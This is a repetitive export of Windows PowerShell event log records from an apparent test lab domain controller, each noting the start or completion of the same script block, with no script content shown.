Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474840
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474839
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474838
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474837
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474836
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474835
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474834
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474833
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474832
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474831
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474830
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474829
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474828
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474827
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474826
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474824
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474823
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474822
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474820
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474819
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474818
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474817
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474816
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474815
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474814
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474813
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474812
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474810
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474809
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474808
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474806
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474805
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474804
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474803
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474802
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474801
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474800
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474799
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474798
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474797
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474796
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474795
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474794
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474793
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474792
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474791
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474790
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474789
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474788
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474787
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474786
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
